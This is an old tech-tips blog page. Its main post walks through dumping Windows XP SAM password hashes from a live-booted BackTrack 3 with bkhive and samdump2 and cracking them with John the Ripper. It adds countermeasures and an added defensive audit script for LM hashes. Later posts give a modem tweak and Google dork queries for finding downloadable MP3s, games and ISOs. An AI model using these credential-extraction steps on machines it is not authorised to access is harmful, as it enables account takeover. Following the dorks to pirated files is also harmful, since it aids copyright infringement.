Cracking Windows XP local user passwords with Backtrack 3

December 8, 2008

Cracking jobs became easy once the Backtrack Linux distro came along, and it gets even easier when you want to crack passwords saved in Windows XP.

Windows XP stores its username and password information in a file named SAM at %SystemDrive%\Windows\system32\config\. The SAM file stores passwords using LM hashes, which are vulnerable to rainbow table and brute-force attacks.

Insert the Backtrack 3 CD/USB and boot it live.

Once you reach the Backtrack 3 desktop, open a console and type:

df    # list the mounted partitions; the Windows system is usually on /mnt/hda1 (used as the example here)
cd /mnt/hda1/WINDOWS/system32/config/
bkhive system key    # writes the boot key from the system hive to the file "key" (see the bkhive manual)
samdump2 SAM key > ~/Desktop/password.txt    # ~/Desktop/password.txt is the example location for the dumped password hash file
cat ~/Desktop/password.txt

You will see the usernames and the hash values from the SAM file.

There are multiple ways to crack the hashes (John the Ripper, rainbow tables, LCP). Here we use John the Ripper as the example.

john ~/Desktop/password.txt --users=Administrator    # Administrator is the example user name

The user Owner has the password “abc123” and the Administrator has no password.

Countermeasures for the attack:

  • Set a boot-up password in the BIOS to prevent unauthorized live boots from CD/USB storage media.
  • Secure physical access to the machine. The cardinal rule that physical access equals total access exists for a reason.
  • Use strong passwords. A strong password combines alphanumeric characters (01245…vwxyz) and symbols (!@#$%^&*()_+) and is at least 8 characters long; it will take much longer to crack (and may sometimes be impossible to crack, e.g. the password “%a^&b*&e^$5*45*&^%<%” against a medium-size rainbow table).
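
Added example (not part of the original post): a defender's audit of the same pwdump-style output that samdump2 writes to password.txt, flagging accounts with a blank password or a stored LM hash. The function names, finding labels and sample accounts/hashes are constructed for illustration; the two empty-password constants are the well-known LM and NT values.

```shell
#!/bin/sh
# Audit a pwdump-format dump (user:RID:LMhash:NThash:::) for weak password storage.
EMPTY_LM=aad3b435b51404eeaad3b435b51404ee   # LM hash of the empty password
EMPTY_NT=31d6cfe0d16ae931b73c59d7e0c089c0   # NT hash of the empty password

# Prints "user<TAB>finding" per account; reads the named file(s) or stdin.
audit_sam_dump() {
    awk -F: -v elm="$EMPTY_LM" -v ent="$EMPTY_NT" '
    NF < 4 || $1 == "" { next }                 # skip malformed lines
    {
        lm = tolower($3); nt = tolower($4)
        # Some dump tools print a "NO PASSWORD***" placeholder for empty hashes.
        if (lm ~ /^no password/) lm = elm
        if (nt ~ /^no password/) nt = ent
        if (lm == elm && nt == ent)
            f = "BLANK_PASSWORD"                # account can be used with no password
        else if (lm == elm)
            f = "OK_NO_LM_HASH"                 # only the NT hash is stored
        else if (substr(lm, 17) == substr(elm, 17))
            f = "LM_STORED_LEN_LE_7"            # empty second LM half: 7 chars or fewer
        else
            f = "LM_STORED"                     # LM hash present: rainbow-table exposure
        print $1 "\t" f
    }' "$@"
}

# Constructed sample dump; the non-empty hashes are made-up hex, not real hashes.
sample_dump() {
    cat <<'EOF'
Administrator:500:NO PASSWORD*********************:NO PASSWORD*********************:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Owner:1003:0123456789abcdefaad3b435b51404ee:00112233445566778899aabbccddeeff:::
alice:1004:aad3b435b51404eeaad3b435b51404ee:ffeeddccbbaa99887766554433221100:::
bob:1005:0123456789abcdeffedcba9876543210:0f1e2d3c4b5a69788796a5b4c3d2e1f0:::
EOF
}

sample_dump | audit_sam_dump
```

Accounts reported with an LM_STORED finding are the ones exposed to the rainbow-table attack described above; enabling the NoLMHash policy and then changing the password removes the stored LM hash.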

Improving dialup modem performance

October 19, 2008

You can’t assume that just because you connected at a speed like 48.3KBps you will stay there. Today’s modems automatically fall back to a lower speed if the line noise is too high to maintain a faster connection, but sometimes they fall back too soon or too far.

Steps to speed up:

Click the Start button.
Select Settings.
Click Control Panel.
Double-click on the Modems icon.
Select your modem.
Click the Properties button.
Click the Connections tab.
Click the Advanced button.
In the “Extra settings” field, type S36=7
Click OK to save your settings.

This will force your modem to try to stay connected at high speeds in two different ways before dropping back to an asynchronous mode with auto speed buffering. Try it; this will work.


Wasting time in searching download links?

October 19, 2008

I have seen many people wasting their time searching for download links. For example, to download movies they type “movie download” into Google, but this also brings up other sites that are not relevant. So here are some tips for those people.

A good way of finding MP3s (or other formats) is to use Google and type the following:
parent + directory + mp3 + OR + wma+ #dido#
Replace #dido# with whatever artist you wish to find, for example:
parent + directory + mp3 + OR + wma+ #Lamb#
This will give you many directories with MP3 or WMA files.

You can do this for anything you want to download:

parent + directory + whatever you want to download (e.g. games)

For MP3 searching on Google

Go to Google and copy and paste this:

?intitle:index.of? mp3

After mp3, put in an artist, album or whatever you are looking for. This will give you lists of downloadable MP3s.

e.g. ?intitle:index.of? mp3 santana

Another trick:
Use the following:
inurl:microsoft filetype:iso
You can change the string to whatever you want, e.g. microsoft to adobe, iso to zip, etc.